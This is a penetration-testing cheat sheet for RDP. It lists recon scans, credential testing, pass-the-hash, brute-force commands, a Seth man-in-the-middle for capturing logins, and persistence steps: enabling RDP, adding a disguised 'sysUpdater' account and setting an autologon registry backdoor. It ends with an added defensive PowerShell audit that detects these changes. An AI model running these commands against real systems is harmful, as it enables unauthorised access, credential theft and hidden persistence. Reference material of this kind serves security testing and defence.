# RDP - 3389

## Resources

### Tools

## Recon
```bash
# rdp-vuln-ms12-020 tests for the MS12-020 flaw; BlueKeep (CVE-2019-0708) is a different bug, checked with rdpscan below
nmap -p 3389 --script=rdp-enum-encryption,rdp-ntlm-info,rdp-vuln-ms12-020 $target

# BlueKeep (CVE-2019-0708) scanner (robertdavidgraham/rdpscan); targets are given as positional arguments
rdpscan $IP
```

```bash
# Check whether NLA is enforced (decides whether an MITM with Seth is feasible)
nmap --script=rdp-enum-encryption -p 3389 $IP | grep -A5 'Security layer'
# Under "Security layer" the script lists every protocol the server accepts:
#   "CredSSP (NLA): SUCCESS" and neither "RDP: SUCCESS" nor "SSL: SUCCESS" -> NLA is enforced -> MITM (Seth) not possible
#   "RDP: SUCCESS" or "SSL: SUCCESS"                                       -> NLA not enforced -> vulnerable to Seth / MITM
```

## Connection
```bash
# test credentials
crackmapexec rdp $IP -u administrator -p password
```

```bash
# https://www.kali.org/tools/freerdp3/ - all packages available
# sudo apt install xfreerdp3-x11   (Kali installs the client as xfreerdp3; the options below are the same)
xfreerdp /v:$IP /u:username /p:'' # username with blank pass
# Pass The Hash (only works when Restricted Admin mode is enabled on the target)
xfreerdp /v:$IP /u:username /pth:<hash>
# Ignore certificate warnings
xfreerdp /v:$IP /u:username /p:pass /cert:ignore
# Require the NLA security level
xfreerdp /v:$IP /u:username /p:password /sec:nla
# Force a security level (e.g., legacy RDP security, no NLA)
xfreerdp /v:$IP /u:username /p:password /sec:rdp
```

```bash
rdesktop -u username $IP
rdesktop -d Domain -u username -p password $IP
```

```cmd
:: Windows (native)
mstsc /v:$IP
:: Admin mode (connects to the admin/console session)
mstsc /v:target.com /admin
```

## Brute-Force
⚠️ Brute-force can trigger account lockout or detection alerts.
```bash
ncrack -p 3389 -u administrator -P rockyou.txt $IP
```

```bash
hydra -l administrator -P rockyou.txt $IP rdp
```

```bash
# msfconsole: rdp_scanner fingerprints the service (RDP present, NLA enforced or not); it is not a password sprayer
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS target.com
run
```

## MITM
With Seth (SySS-Research/seth on GitHub) you can perform an MITM attack on RDP by presenting a fake server certificate to the client.

⚠️ Note: this attack only works if NLA (Network Level Authentication) is disabled on the target. Most modern systems have it enabled by default.

```bash
seth -i <interface> -t <target_ip> [<target_ip_x>] --rdp
```

If a user connects to the targeted machine during the attack, their credentials may be captured by the attacker.

### Note

Seth performs a man-in-the-middle attack against RDP by spoofing the server certificate and relaying the connection. It requires the client's traffic to be redirected to the attacker first, i.e. an LLMNR/NBT-NS poisoning or ARP spoofing setup (e.g. with Responder or bettercap). Enforcing NLA on the server (the check in the Recon section) is the mitigation.
## Persistence via RDP

- Enable RDP remotely (if you have an admin shell)

```ps1
# Enable RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
# Allow through firewall
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
```

- Add a new RDP user

```cmd
:: sysUpdater (less likely to raise alarms); run from an elevated prompt
net user sysUpdater Passw0rd! /add
net localgroup "Remote Desktop Users" sysUpdater /add
```

- RDP backdoor via registry (for autologon)

```cmd
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d sysUpdater /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d Passw0rd! /f
```
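Blue-team counterpart to the NLA check in the Recon section and to the Persistence commands above, added here and not part of the original cheat sheet: a read-only PowerShell audit of the registry values, group membership and firewall rule group those commands touch. It assumes an elevated PowerShell 5.1+ session on Windows 10 / Server 2016 or later (LocalAccounts and NetSecurity modules present); the function and check names are my own.

```powershell
# Added audit script (not from the original page). Read-only: it reports findings
# and prints the fix for each one, it does not change any setting itself.
$TsPath       = 'HKLM:\System\CurrentControlSet\Control\Terminal Server'
$RdpTcpPath   = "$TsPath\WinStations\RDP-Tcp"
$WinlogonPath = 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon'

function Get-RegValue($Path, $Name) {
    # $null instead of an error when the value does not exist
    (Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue).$Name
}
function New-Finding($Check, $Value, $Ok, $Fix) {
    [pscustomobject]@{ Check = $Check; Value = $Value
                       Status = $(if ($Ok) { 'OK' } else { 'REVIEW' }); Fix = $Fix }
}

function Invoke-RdpHardeningAudit {
    # 1. Is RDP enabled at all? (fDenyTSConnections=0 is what the persistence block sets)
    $deny = Get-RegValue $TsPath 'fDenyTSConnections'
    New-Finding 'RDP disabled (fDenyTSConnections=1)' $deny ($deny -eq 1) `
        "Set-ItemProperty '$TsPath' fDenyTSConnections 1 unless RDP is intentionally used"

    # 2. NLA enforced: UserAuthentication=1 is what removes 'RDP/SSL: SUCCESS' from the
    #    rdp-enum-encryption output and closes the Seth MITM path
    $nla = Get-RegValue $RdpTcpPath 'UserAuthentication'
    New-Finding 'NLA required (UserAuthentication=1)' $nla ($nla -eq 1) `
        "Set-ItemProperty '$RdpTcpPath' UserAuthentication 1"

    # 3. Winlogon autologon backdoor: AutoAdminLogon=1 plus a cleartext DefaultPassword
    $auto = Get-RegValue $WinlogonPath 'AutoAdminLogon'
    $pw   = Get-RegValue $WinlogonPath 'DefaultPassword'
    New-Finding 'No Winlogon autologon' "AutoAdminLogon=$auto; DefaultPassword present=$($null -ne $pw)" `
        ($auto -ne '1' -and $null -eq $pw) `
        "Remove-ItemProperty '$WinlogonPath' DefaultPassword; set AutoAdminLogon to 0"

    # 4. Who may log in over RDP: every member deserves a look, recently added ones especially
    $members = (Get-LocalGroupMember -Group 'Remote Desktop Users' -ErrorAction SilentlyContinue).Name
    New-Finding 'Remote Desktop Users members' ($members -join ', ') ($members.Count -eq 0) `
        'Remove-LocalGroupMember -Group "Remote Desktop Users" -Member <account> for unexpected entries'

    # 5. Firewall: the persistence block enables the whole "Remote Desktop" rule group
    $fw = @(Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -ErrorAction SilentlyContinue |
            Where-Object { $_.Enabled -eq 'True' }).Count
    New-Finding 'Remote Desktop firewall rules enabled' $fw ($fw -eq 0) `
        "Disable-NetFirewallRule -DisplayGroup 'Remote Desktop' unless RDP is intentionally used"
}

Invoke-RdpHardeningAudit | Format-Table -AutoSize -Wrap
```

Every REVIEW row is either an intentional RDP deployment (then rows 1 and 5 are expected) or a setting that matches one of the persistence or downgrade techniques on this page; row 3 in particular has no legitimate reason to exist on a server.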